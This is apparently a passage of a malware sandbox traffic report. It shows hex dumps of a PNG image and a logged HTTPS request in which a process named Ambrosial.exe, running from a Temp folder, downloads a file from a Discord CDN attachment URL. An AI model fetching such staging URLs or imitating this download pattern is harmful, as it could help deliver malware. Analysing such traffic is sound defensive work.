                                                                                                                                                                                      2021-10-30 11:52:16 UTC541INData Raw: 12 53 d1 0e 71 62 bd 42 b7 f5 a2 51 aa 3f 1b 51 30 c9 22 35 ef c5 bc b1 13 33 51 fa c5 66 7f 10 e9 3c 7e f0 90 59 48 4f 1e 63 11 ad 21 69 f9 8a ef 65 2c 10 4f c7 b2 09 8f 75 b0 78 50 41 af a1 c5 57 a6 22 3f 14 be 07 b5 48 b9 f5 c0 5b b6 4e 7c 6d 4e 0d 40 7d 72 cd 26 49 7b 5f d4 09 1a 79 63 f5 f7 59 10 df 57 f8 36 20 2a 23 5c 49 df ae f3 86 ed c9 44 9d 10 45 8f dd 57 1b 45 ca 76 c1 f6 11 b0 56 5d b4 c9 64 bb d9 d2 b5 9c c2 c4 ed 05 dc 86 f4 92 3c 76 79 b4 9b 99 54 6b 2a 7e d9 80 a3 33 da ac 42 10 4b 33 c2 43 b8 73 4d 7c 59 81 92 f5 dc 41 34 92 cd 13 c8 6d 24 80 aa 5e f1 22 cb b6 a1 f5 06 af 89 27 d8 7d be 02 7a 94 17 63 04 9b 5a 7b be ca 60 da 80 9e d5 79 22 a0 ec 7d a5 27 69 7b bf c9 c6 92 be f1 67 73 75 20 31 29 c3 fe ea 04 4d 3c 93 34 fe ad 29 f3 f2 91
                                                                                                                                                                                      Data Ascii: SqbBQ?Q0"53Qf<~YHOc!ie,OuxPAW"?H[N|mN@}r&I{_ycYW6 *#\IDEWEvV]d<vyTk*~3BK3CsM|YA4m$^"'}zcZ{`y"}'i{gsu 1)M<4)
                                                                                                                                                                                      2021-10-30 11:52:16 UTC545INData Raw: eb 9b a0 39 36 d3 7c e6 bd 25 31 25 3f e8 4b 0a 0b 08 53 f4 a6 37 a4 a5 03 dc e8 82 e5 25 26 d2 f6 33 af d1 f6 d8 49 a1 5f 53 c0 35 c4 64 88 ef cd 4e cc 40 b1 a6 ee e8 8f 23 c9 2b c1 e0 7b 79 23 e3 61 1b a6 01 f1 12 69 83 9f e4 a9 97 36 94 cc e0 72 42 a6 74 4c 32 4f 01 db 58 df ba ee 03 7a 08 dd 1e a9 3f f6 04 af 24 ed ca bb 8d f0 6c c2 c0 c9 e1 fa e1 0f 8e eb 07 15 25 64 93 a4 f1 7b 9a 5a f3 3b 61 43 12 97 44 2d 4f d5 08 fe 38 74 e6 95 f3 e5 44 cd fb 94 ff a0 5d f3 88 bd e8 b3 6f e6 f3 dd 3f fe 27 7f a2 27 6a 0c 46 1b 88 8d 93 57 72 66 3e bf a2 ed 9f ac c8 83 e6 10 64 1d dd e1 5e fa 80 e1 08 3d 76 c2 21 9c 20 13 27 ab 01 bc 5f e6 55 46 21 0e e4 d4 97 16 6a d3 d6 54 11 6d 43 14 1d f2 19 7b 64 95 57 13 01 f5 cf 36 3f 27 ae 53 17 38 86 0e 68 51 cc b4 1b fd
                                                                                                                                                                                      Data Ascii: 96|%1%?KS7%&3I_S5dN@#+{y#ai6rBtL2OXz?$l%d{Z;aCD-O8tD]o?''jFWrf>d^=v! '_UF!jTmC{dW6?'S8hQ
                                                                                                                                                                                      2021-10-30 11:52:16 UTC549INData Raw: ef 6b f8 a6 02 58 ba 9a e7 9c 6d e9 42 fb 94 93 a0 cd 47 9f d9 0f 93 ac 89 ca 7f e2 53 5b 00 f6 e4 b1 e3 ea 35 e3 79 30 42 1f e4 f5 f1 e3 17 ff 1f fb 7a c5 5a a7 9f fa e9 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                      Data Ascii: kXmBGS[5y0BzZIENDB`


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      8192.168.2.349755162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:18 UTC549OUTGET /attachments/489891892142669842/844005578808360960/yeeee.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:18 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:18 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 117969
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646fca08ea5bf5-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 113697
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "57b901d65f2725d394d569c05dd34fa4"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:18 GMT
                                                                                                                                                                                      Last-Modified: Tue, 18 May 2021 00:16:50 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1621297010897343
                                                                                                                                                                                      x-goog-hash: crc32c=8ngaGQ==
                                                                                                                                                                                      x-goog-hash: md5=V7kB1l8nJdOU1WnAXdNPpA==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 117969
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdsX4slFsYSJeRA6EI0jVRIm59FopZLgvJoW6XM86ZFw0D_4eAHny8EUeC3p7xVvhYZoCwPvPtkjhww7s9dXegs
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jOohNO967Ka8wy%2BZnEi3pYUMeTyNkQ7h2rMEL%2Fj527xNn2YmpbwkVoUApDfeRtc4wEp0SHCZ89HadnyW4d5YCWRzlaHxsbJMKS5j21r2AYfX5IjRwlL8k2REimY5in6SeQ0C6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:18 UTC551INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:18 UTC551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 ff a5 49 44 41 54 78 5e ac fd 7b cc 75 5b 96 d6 87 ed f7 7b bf cb b9 54 9d aa ae ea 7b 53 5c 1b 0c ed 06 37 dd 98 36 77 b7 c1 dc 62 05 48 22 30 98 a6 2f 60 08 b2 85 44 94 44 89 a2 84 8a 64 e5 9f e4 8f 44 f9 c3 4a 22 45 b1 1d e7 a2 24 8a 6c 29 02 d9 4a 14 2e 31 b6 51 07 83 02 6e 4c d3 40 43 43 bb e9 aa ae db 39 e7 bb 7f 79 7e cf 33 c6 9c 63 ad 77 7f e7 9c 2a 18 7b 8f f5 8c 31 e6 9c 63 5e d6 5c 73 8d 77 ae bd f7 7b f3 f2 c7 fe cd 57 37 af 5e 5c 2e 2f c4 2f e1 e7 c1 d6 49 7b f5 f2 22 45 fc ea 72 b9 11 df 93
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYs(JIDATx^{u[{T{S\76wbH"0/`DDdDJ"E$l)J.1QnL@CC9y~3cw*{1c^\sw{W7^\.//I{"Er
                                                                                                                                                                                      2021-10-30 11:52:18 UTC552INData Raw: d4 fb 0f 1f b8 d2 2d 93 1e 96 e9 0a f7 75 c8 88 e4 35 fb b1 d3 db 37 bc d3 cd a7 32 3b 5f 78 b6 eb d0 3f cb 23 df c8 b3 f3 ee f4 2e d3 9c 7c 5d ee cc c7 bc 32 65 0c 26 eb 00 36 65 d5 2c ae b9 39 a9 66 f5 e1 15 ab 8e a3 48 eb 1f 44 69 43 da 75 e6 6b 74 48 2b 61 e6 a5 2f 4d 11 d3 00 e4 03 eb d0 ab 22 0c 45 de 6d 81 96 3c 1c 6f e9 48 6b 2c ea ba 7f e9 3f 90 5f 1a 5f 2a b0 23 b8 7b f1 42 81 61 b3 ee 69 2d 3f d3 7d ed b9 ee 6f cd 2f 14 33 bd 90 ed 85 ee 75 70 62 1d b9 d6 62 dc f1 cf 2b dd 5f c3 2d 6f bc b7 82 af 0e ce 26 9e d9 79 d5 f0 46 55 1c 96 cc 0a 78 b8 e1 de 65 47 bd ab 51 85 c5 bd 91 b7 74 f9 4a fe a0 46 46 09 0a 3b d2 7a 0d 6e ef 83 25 14 39 72 6e 65 ca 98 11 5f 24 5f 7e 25 a5 59 1e 17 d3 85 de 5d f3 0e 5b d9 5a 56 33 cd 33 60 db 28 7f 65 97 58 3c e5
                                                                                                                                                                                      Data Ascii: -u572;_x?#.|]2e&6e,9fHDiCuktH+a/M"Em<oHk,?__*#{Bai-?}o/3upbb+_-o&yFUxeGQtJFF;zn%9rne_$_~%Y][ZV33`(eX<
                                                                                                                                                                                      2021-10-30 11:52:18 UTC553INData Raw: 4d b8 03 a5 0e d2 9e cb 43 ef a4 f1 f9 34 07 6e ca bb 3e ab a6 d2 be b9 c1 50 c9 b6 4b 68 8e df f8 4a e0 17 99 5d 36 63 5a 5a f9 5a df e5 1d 9c 81 8e be 54 81 30 17 01 5c b2 93 32 51 c2 92 f5 e2 0d 61 6b 19 ca 4d 39 64 b1 0f bc 91 17 97 61 72 65 a2 6d 5a 3a e4 2c ed b3 5c 6d a5 02 07 69 25 47 97 ca c0 f9 dc 8b 57 a0 86 ae f3 8a ee 39 55 ec 59 ac 34 98 bf 24 c0 f6 27 4a fd 43 26 a9 6c 8d c7 71 14 57 bb e3 5a e3 bc fa d1 69 1d a8 c5 ee b1 97 6c e7 03 3d b6 83 f7 f9 a8 14 cb 35 1a 25 93 e2 c5 d6 f9 9d e0 b4 28 10 39 9c b1 68 a4 ed 2c 39 e4 1d 5a 42 51 e7 29 8e 0b 1d ba ae c5 95 05 32 96 6d 19 af 53 fc ed 5c e0 64 c8 3d a9 8c 6d fb aa c8 e7 fa 44 3e 67 4d 59 e8 22 e5 70 48 f3 b1 29 2d 68 db 2e a7 f3 bb e4 e8 4d 67 bd 0c e6 43 bd 20 b6 92 a1 4e 5f d6 02 bc 2d
                                                                                                                                                                                      Data Ascii: MC4n>PKhJ]6cZZZT0\2QakM9daremZ:,\mi%GW9UY4$'JC&lqWZil=5%(9h,9ZBQ)2mS\d=mD>gMY"pH)-h.MgC N_-
                                                                                                                                                                                      2021-10-30 11:52:18 UTC555INData Raw: 0e 9e fd 12 d6 55 60 db 3e 27 6d 03 39 b4 6e b5 84 3b 79 75 08 0e ee f4 ca 93 b9 5c 5c af 55 ef e0 43 be 0f e0 99 cf b2 ea b9 1b 78 c8 e6 3a 86 ad 74 e7 75 99 cd 4e ff 00 9e 79 5f c7 f9 ec 57 fc 9f 03 a4 fe 9c d8 62 9d 84 5d b6 6d 23 1d fb d4 97 1c fb e1 f3 67 4e 1b be ac 6f ee 3e b7 ac f7 66 46 22 ef 3a 4c 1a d7 cd b8 ce 66 e6 2e 3f 0b 23 1d af b8 af 86 28 77 bd ec 6b 3d 56 c2 6c e2 94 9b 7c 6f b0 70 2d 1d 4b ac e4 73 a0 a6 9b 0a 3b 65 79 ec f9 f2 f2 8c 20 8d 60 ad 82 34 07 6b 87 40 8d 7d 38 91 da c3 38 73 6e f8 86 7e 07 6b c8 7b 37 ad 1a 2d d8 01 59 82 b3 0e ca 5a 9e 21 53 48 93 c7 0a 3e da 0f 67 a2 f5 f6 9f fb 50 6c f7 14 a8 fd fe 7f 61 07 6a cf 08 d2 1a 65 53 c7 12 a8 c9 b3 3a 93 56 a9 1c 35 e3 60 55 d8 54 32 37 57 d2 60 f2 c3 ec 9e d4 67 d3 66 90 c6
                                                                                                                                                                                      Data Ascii: U`>'m9n;yu\\UCx:tuNy_Wb]m#gNo>fF":Lf.?#(wk=Vl|op-Ks;ey `4k@}88sn~k{7-YZ!SH>gPlajeS:V5`UT27W`gf
                                                                                                                                                                                      2021-10-30 11:52:18 UTC556INData Raw: 55 e3 65 19 cc da df f7 74 36 62 96 6c d6 e8 82 bc 5e fe 5f 3e fb ca 5f 26 e8 00 6d 05 6a b2 65 eb 43 b9 3d 2c c1 fe 7e 35 c1 1a 7c 2d 50 f3 f7 8d c5 6a 98 6f 7a ba 19 7a b7 04 b7 cf 74 73 74 a0 96 2f 11 3c af 1f bc 35 23 2b 58 23 48 7b 55 41 da cd 33 dd 3e 15 a8 dd aa 5d fe 8c 1a 81 5a 05 67 1d a8 39 f4 d1 49 9a 37 45 b7 58 87 be 01 67 07 6d ef 9a 39 48 ab 00 6d 07 6b 09 de 12 a8 a9 2d 42 07 6a d5 f7 0e 7e 3a 50 0b ab 9b c2 0c a8 48 48 e8 b6 7e fc 16 f9 d5 fe c9 59 5a 19 44 27 af 4a b9 4c c9 b2 fb 0c 95 1d c6 77 e3 3c 91 be a1 17 6e ee c0 b1 da 27 af 09 d0 90 83 f9 31 5c b5 c2 79 82 1d ac b9 2f fc f0 2d 28 76 93 e4 a3 51 92 db 12 0d ec b6 d3 ee f4 2b 7d 28 84 09 d2 84 09 d0 90 41 65 b1 0e e2 25 08 91 7e 87 aa 4e e7 d4 3b 75 0b 4b a6 28 a8 59 13 76 00 06
                                                                                                                                                                                      Data Ascii: Uet6bl^_>_&mjeC=,~5|-Pjozztst/<5#+X#H{UA3>]Zg9I7EXgm9Hmk-Bj~:PHH~YZD'JLw<n'1\y/-(vQ+}(Ae%~N;uK(Yv
                                                                                                                                                                                      2021-10-30 11:52:18 UTC557INData Raw: 8b 3f 97 66 79 e3 0a d4 74 3e aa a5 0e c8 4a 2a 99 ee f0 02 69 7b 64 c8 7d 8d 94 44 8b db 66 b7 60 c9 dd 96 cc 08 a1 0e c8 1d ac ad 40 4d f2 21 70 ab b4 c6 f8 a1 4e 2a 08 a6 2d c1 0f 0d a4 5c 3b 10 e4 e2 cf bb ed e5 5a 44 49 64 fb 3d f9 ef c0 6d d7 93 32 71 c3 41 1e f1 cb 22 65 b9 98 94 42 28 7d 89 af 46 7c e2 30 be 4b 17 35 3a 63 51 fb 69 3a eb 77 0d 83 b6 9b eb 54 65 5f 57 07 fd 33 d6 f1 a8 9f d3 4f 34 ea b6 b8 fa 16 8a cd e2 a2 93 7a 85 5e 93 63 99 23 9c aa 32 cd 2c 8c f9 a4 ce 7f cc b3 85 b6 1b 4b 69 5b a4 e3 40 18 d6 a0 48 c8 3b b4 84 8f 4e bb 2e 64 69 c3 30 d3 4c cb c0 bc 2a 11 b2 ac 43 db 66 9a c8 cd aa 76 ae f9 7b d2 0f e7 bb d2 ee d2 c9 f1 89 3e 38 f5 f5 74 b5 9c 8c b1 ef d4 bb e7 f2 74 b6 a5 1c f4 2b 74 27 bd c7 c3 62 24 8f 89 c4 73 90 b6 f5 ca
                                                                                                                                                                                      Data Ascii: ?fyt>J*i{d}Df`@M!pN*-\;ZDId=m2qA"eB(}F|0K5:cQi:wTe_W3O4z^c#2,Ki[@H;N.di0L*Cfv{>8tt+t'b$s
                                                                                                                                                                                      2021-10-30 11:52:18 UTC559INData Raw: 08 19 83 1e 9b 60 82 9f 0e 74 c2 7a 6f ac 7c ae ed d0 28 30 f2 9e 8f 8d 77 e9 9c b2 8a 98 ee 96 eb 39 c7 31 ed 4b 9b 57 3b 65 78 21 84 fd bb 67 6d 1f ac b7 cb da 53 a1 fd 0e b9 39 3e c7 8e 9a 82 2f be 28 40 20 f6 9e 38 ff 98 9d c7 9f 0a d4 14 a4 21 1f 03 b5 e7 f2 c1 ea 9f 75 38 8f 3f 6f b3 93 e6 20 ac 83 b2 04 66 09 dc 7a a7 ad be 68 20 fd 5a b0 76 de 51 7b ed 67 d3 78 21 88 7c c4 0e bc f8 37 fe 04 bd d4 8d 54 0d f4 48 0a a5 eb 50 4c 5e a1 73 8b 3b 12 e8 cf a9 f9 ce 2f 63 cb 8e 12 c4 04 28 02 0a ed 40 4d fc 5c b2 02 b1 0e d6 08 cc fc 9f 08 08 d0 3a 48 e3 f3 72 a0 da d3 41 1a ed 23 38 4b 80 a6 db ae 9b 84 9c 36 42 d6 28 96 1c 0e d4 d6 4e 9a 83 b0 6b 81 5a 21 f6 ca 73 dc 51 1b 35 d0 35 c0 a8 da 86 4e 57 33 c0 a5 90 a3 f4 04 69 1b 8f 01 da 96 7d 4a da 19 9a
                                                                                                                                                                                      Data Ascii: `tzo|(0w91KW;ex!gmS9>/(@ 8!u8?o fzh ZvQ{gx!|7THPL^s;/c(@M\:HrA#8K6B(NkZ!sQ55NW3i}J
                                                                                                                                                                                      2021-10-30 11:52:18 UTC560INData Raw: c1 d9 e3 57 b7 b6 cf 40 ad 3f d3 d6 be f0 db fd f1 51 07 b7 05 6e 99 83 a4 80 2d c1 25 1f 83 33 dd 6e 87 5c 58 7a 5c b4 5c 69 31 5a af 2c c9 63 c4 ea 14 cb 9c 0a c6 c8 a7 49 4c 90 d6 a7 a9 03 b3 b3 9c 2f 14 c4 96 40 0d 3f 15 a4 95 dc 8f 3e 9b 7a dc b3 73 c6 a9 ca 78 f1 b8 33 48 ae a4 a7 75 3a 4a 36 ca 69 da 99 b6 ad 20 ad ed 42 eb e4 28 7b cb 65 40 38 c8 35 2b 56 90 46 da 6e 63 b7 b7 b8 74 4d 2f c9 ba d0 87 9c f4 42 71 1f 5d 3f 28 ff b4 39 6d a4 bd 85 a5 eb bd f2 86 52 de 95 4a 0e e0 5f 82 93 92 4e 09 73 95 6f 9f 1d a4 b5 7f a3 f3 1d 6b b1 ef 3a 76 fb bd 80 b5 cd d8 e4 4a a8 05 47 f1 35 fd 2e 7d e4 6b b2 38 f4 41 cb 7a 25 39 a6 53 42 a9 57 b2 9b 76 7b 8f 74 b0 a3 2c 07 c3 d3 c1 a9 94 bc 3f 94 9c e7 5a c5 d7 0a 6b 8c 0e 74 ae c3 4a 2c 43 0c 49 3e 8c eb 1d
                                                                                                                                                                                      Data Ascii: W@?Qn-%3n\Xz\\i1Z,cIL/@?>zsx3Hu:J6i B({e@85+VFnctM/Bq]?(9mRJ_Nsok:vJG5.}k8Az%9SBWv{t,?ZktJ,CI>
                                                                                                                                                                                      2021-10-30 11:52:18 UTC561INData Raw: a1 58 55 c5 6b e8 b5 09 ab 1f 07 52 f6 f2 e8 e3 d5 e2 a3 32 ff 21 f8 55 93 47 e1 ba ef 0f a0 55 6d 17 7e 5d 79 37 49 07 f0 9a 3c e0 83 29 73 60 51 95 bf 6b 7b 8d bb 6e 67 43 77 40 c0 9c 88 8c 72 44 27 71 c8 85 b0 9f c0 b4 6c 73 30 99 45 dd 28 a1 ef 07 46 da 5a 28 5b eb 34 d6 b0 8b 1c 10 da 57 92 a8 12 56 ba 51 07 d0 50 32 74 ce 0b 4d b9 68 78 5f d4 5d b9 4a 67 87 56 07 1a 0a 4d 9d 76 a2 6e 9f 8f a8 6e 7d 65 27 50 d9 36 b2 22 05 43 c1 34 b4 6d ab 37 82 0f ea c2 4c 8b 3c 2d e5 ad ea ea 7a 13 3c 11 a0 dd 0d d2 fc bf 37 9b 15 54 ad e0 8d 20 4d 41 53 3f fe e4 c5 15 d7 b5 75 dd 41 52 75 24 1f f5 88 0f 5f 26 18 3b 6a 79 fc 29 ae dd 34 02 b5 c7 0a d4 f8 61 5c be 48 40 39 cf 2f 11 d3 94 2f 13 f0 d9 b4 04 5e 04 6b 23 48 7b 10 74 a0 66 3d d8 bb 69 e4 cb a3 cf fd 9b
                                                                                                                                                                                      Data Ascii: XUkR2!UGUm~]y7I<)s`Qk{ngCw@rD'qls0E(FZ([4WVQP2tMhx_]JgVMvnn}e'P6"C4m7L<-z<7T MAS?uARu$_&;jy)4a\H@9//^k#H{tf=i
                                                                                                                                                                                      2021-10-30 11:52:18 UTC563INData Raw: 60 05 70 23 40 0b f3 e5 03 82 b4 7e ec a9 60 8d dd 34 f9 a5 1f bc 9b fa fc 78 cc 24 ad e0 56 13 be 1f ff de 7c e9 0f ff c1 15 7f 18 18 88 52 32 18 25 63 b7 0c 4e 39 e9 96 05 39 88 56 ed 91 51 d7 a2 d3 81 59 e9 96 17 eb 00 42 c6 52 0c 71 1e 4b 82 34 02 81 0e d2 1c a8 55 e0 d5 bb 69 fb 71 27 41 5a 07 68 09 dc 1c cc 15 13 a0 f5 8e 1c c8 a0 74 90 46 7d e8 5d 6f 48 d8 62 c9 1e 81 42 8f 91 15 e4 61 b3 62 6d c8 b8 28 1d cd ef 63 9a 2d 56 50 23 74 5a 52 73 88 cc 84 2e 59 87 5a 1f 97 7d 71 d9 a7 be 1f 7d c2 1d a8 ed 74 fc e9 5d 6d b1 84 60 cc 05 df 41 5a 8f 17 e7 a8 04 53 72 41 95 3b d8 fd d0 21 f5 d0 5f 26 f5 94 c1 ce 6b 61 95 85 1a 43 c9 7b 97 62 dc 4d e2 d2 ec 36 46 46 89 8d b9 69 69 a4 4b b0 1c ea 3a d2 26 c6 89 7a 8b f5 62 dc 5a 26 5d 62 95 2f 27 ae 2b 3e 8d
                                                                                                                                                                                      Data Ascii: `p#@~`4x$V|R2%cN99VQYBRqK4Uiq'AZhtF}]oHbBabm(c-VP#tZRs.YZ}q}t]m`AZSrA;!_&kaC{bM6FFiiK:&zbZ&]b/'+>
                                                                                                                                                                                      2021-10-30 11:52:18 UTC564INData Raw: 95 ec 6a 38 54 45 33 58 cb df 48 7a 55 75 5d 5b 0a 05 5d d4 08 f3 d7 6b ea de b6 e4 0d a2 5b 2d 3a 28 8b 96 f5 4e f2 b5 fc b2 5d 77 23 f3 6b 12 26 75 f1 ac 6e 57 68 8f ad e9 a4 42 2e 79 ad 78 8d db 1e c0 89 27 9b a9 85 6a 54 3b 9e be c9 5e 65 8c 2b 30 29 59 90 43 08 c9 63 6f 7f 03 a1 85 81 73 3b 86 9b 03 2d b3 cb e9 00 0e df 09 c0 da 26 9e ba e7 5c e9 d8 9d 16 7d 05 6e 7a 83 c0 3e a8 56 2a ae be a7 af 12 66 ff e7 e3 cf 4e 23 af 38 c5 7c 30 d9 5e 64 71 d9 67 9e 25 2c db 2a 28 58 2b 57 a7 89 dc dc a2 29 43 67 bd 29 f6 e9 ab 65 50 5c b6 fd 85 96 b6 41 4b 38 88 9b b6 f1 4e b2 0c d3 f6 3a f9 9c ef 4c e7 b4 d6 17 56 79 98 00 03 7d 05 68 b0 ce 53 02 0d a1 83 a7 3c f6 5c 81 da b3 bd ab c6 b7 33 b1 b3 13 96 6f 7e e6 a7 32 38 57 cc 2b 82 34 02 9e 04 6b ac 7d 3b e8
                                                                                                                                                                                      Data Ascii: j8TE3XHzUu][]k[-:(N]w#k&unWhB.yx'jT;^e+0)YCcos;-&\}nz>V*fN#8|0^dqg%,*(X+W)Cg)eP\AK8N:LVy}hS<\3o~28W+4k};
                                                                                                                                                                                      2021-10-30 11:52:18 UTC565INData Raw: 24 a7 86 40 83 8d cf 0e 36 14 9c 09 7b 37 2d 8f 3d 3b 50 eb 5d 35 76 bb 08 d6 fa f3 69 09 d2 78 64 f9 42 e8 1f 9f 95 8f d4 5c 9f 19 73 a0 96 60 ad ff 1d 93 77 d7 94 ee 35 2f 8d 73 59 82 bd ec d2 e5 b1 67 ff 3c 47 3f f6 fc 72 05 6b 09 d4 12 0c 39 50 d3 c9 24 f8 e3 f3 69 0e d4 14 98 bd ad 20 ad 03 b5 b7 c5 7b 37 8d cf a6 dd 5e 1e 11 d4 55 a0 76 5f ed 20 50 73 40 69 24 40 eb 5d b5 6a a7 18 ca 38 1e 83 34 3f f6 64 8c 34 0e 0e 66 dd 36 45 28 9f 77 a0 46 31 1d 7a c6 81 65 2b 9f 12 23 33 68 79 27 01 5c 59 96 4d a4 41 6b 84 5a b6 6a ec e0 2c e8 80 ab 90 c7 98 33 58 43 66 04 91 2d 2a 4f 64 f2 6d ce 63 cc 3c fa 24 10 eb 47 9d f9 02 c1 ed b2 77 90 96 ff 3e 70 6f 3d ea c4 07 3e db 7f 63 26 65 d9 94 05 19 32 d6 00 65 f0 35 02 1e 27 d8 da d2 7d 82 9c 3f 79 fd 72 d1 6b
                                                                                                                                                                                      Data Ascii: $@6{7-=;P]5vixdB\s`w5/sYg<G?rk9P$i {7^Uv_ Ps@i$@]j84?d4f6E(wF1ze+#3hy'\YMAkZj,3XCf-*Odmc<$Gw>po=>c&e2e5'}?yrk
                                                                                                                                                                                      2021-10-30 11:52:18 UTC567INData Raw: 68 15 ac ed 20 4d 79 75 72 53 a6 03 35 e8 58 0f 13 33 be 5b 06 8f 79 b3 08 d1 bb 42 71 6e c6 43 76 52 6c ac 73 94 8d 9e e2 d1 27 42 db 66 12 a4 44 d1 32 6f 5b 97 05 2c ea d0 f2 e2 b2 ad 40 ec 60 a7 b7 d1 f7 7a 9c 1a 48 4f c0 b9 6d e9 5b a7 fb 98 74 2c 79 2f b2 3c 6c ce 5e 68 1f c6 29 0b d5 c8 0e 3c d0 5b 76 db d0 ef d8 4b 2f fb 51 de be 39 00 10 b6 3b c4 04 2d 8a 98 05 ab 51 47 27 f4 cd 33 37 8f 2d 27 e7 26 57 c9 8b 36 18 4b d6 a1 c7 94 83 51 fa 22 8b f1 1b a9 88 b2 c6 ed c7 be 7a 3c ba cf 63 1c 18 b4 2e b3 fd 55 9b f5 f2 fc 96 d2 b5 ad ba 20 7c 34 96 dc 7e a3 37 8e bc 4d a5 cc b5 a0 e9 60 ba 93 7e f0 72 87 8e fe 4a 11 ac 52 2b 5d 42 cb 07 2c a5 6d 93 ee d8 64 c0 66 d6 08 71 97 12 1b 1d 9c 49 26 58 93 dc 41 db 62 bd 43 08 6a 1d 0d 74 23 4b 76 ba ca 81 f8
                                                                                                                                                                                      Data Ascii: h MyurS5X3[yBqnCvRls'BfD2o[,@`zHOm[t,y/<l^h)<[vK/Q9;-QG'37-'&W6KQ"z<c.U |4~7M`~rJR+]B,mdfqI&XAbCjt#Kv
                                                                                                                                                                                      2021-10-30 11:52:18 UTC568INData Raw: c0 4a 34 8a 76 d1 f2 6b db 51 76 aa 20 59 e7 71 52 79 9c d0 95 34 1d f4 63 fe 49 f6 3d 1c 1c 03 35 1d c0 65 2b 61 e9 8d 2d 14 1d d2 33 1e 3e e8 e2 77 80 26 3e 04 68 ba 73 05 2b 50 d3 42 eb b4 0c 64 b5 89 43 0d cc 79 40 c8 56 79 b3 73 a4 b2 d4 05 52 0c f4 d8 4a d4 39 d5 64 11 27 30 9b 81 1a 73 dc b2 de 3e 09 83 70 d3 e4 ba ae d1 2c 82 1b eb 08 81 e5 b3 4f b0 d5 96 0b 75 70 b6 95 d7 96 4a 0b 0d b1 1a 46 9f ad d1 b8 c8 b3 ef 57 30 22 47 9b 86 9b 6d 6b 4a 5a d6 ba d2 7c 4e 6a 05 37 92 d6 4c 9e 2d df 45 a4 2d 9f 48 09 a4 cd fa 8f a4 84 bc 97 1c da f2 4c bb 56 cf d9 b6 f4 53 42 b9 5b 6d c9 38 c5 2f a6 9e 73 b6 16 22 58 d4 d1 53 51 92 03 09 a1 1f 6f ca 00 3b f0 42 36 26 10 7b 8a 3c 99 fc 25 27 40 a3 3c 98 47 7c fd 7b 67 7c 26 ad 1f 79 be 7c 05 12 a4 f5 a3 4f a6
                                                                                                                                                                                      Data Ascii: J4vkQv YqRy4cI=5e+a-3>w&>hs+PBdCy@VysRJ9d'0s>p,OupJFW0"GmkJZ|Nj7L-E-HLVSB[m8/s"XSQo;B6&{<%'@<G|{g|&y|O
                                                                                                                                                                                      2021-10-30 11:52:18 UTC569INData Raw: 8b ad b8 e4 aa e3 8c 88 25 14 b6 4a 86 25 8a fa dc 99 ba 4d 6d ea 31 19 72 b2 6c 79 61 c9 d0 96 95 0f 68 92 72 58 f3 24 4f ec f4 d8 c2 d0 01 4b 09 74 ca 94 8e 74 ae bf 75 b7 6c e8 91 4b 5b 46 28 ca f4 df f2 35 db b9 21 6b 4c ca 3f 98 29 19 99 83 e7 9a d3 9c 50 f9 9d db c8 5a d6 41 5a 1e 75 76 40 76 d1 3d 3a c1 18 b2 51 fa 0c da b2 a3 a6 cb c2 18 3f c8 1d a8 85 47 a0 e6 6f 7a aa 46 05 14 0e d4 7c b7 a5 5b 15 a8 39 38 4b 70 94 0f f0 df f7 4f 63 3c d2 22 07 27 58 d3 e5 40 59 05 3b 2f 09 be 78 74 e8 47 9f 7c 71 e0 b1 bf 44 c0 63 4f 82 b4 2f 3c 79 ff f2 25 1e 87 56 a0 f6 54 e5 08 4a 89 19 6e fd e8 53 fe fd b8 f3 d1 e5 ed 47 6f fa 0b 05 6f ae 40 6d ec a8 29 2f ed 73 a0 a6 f2 7d 7f af 88 a3 e4 9c 9e be 16 18 df fe 81 db 73 a0 c6 a3 4e be 40 c0 17 20 f8 41 60 7f
                                                                                                                                                                                      Data Ascii: %J%Mm1rlyahrX$OKttulK[F(5!kL?)PZAZuv@v=:Q?GozF|[98KpOc<"'X@Y;/xtG|qDcO/<y%VTJnSGoo@m)/s}sN@ A`
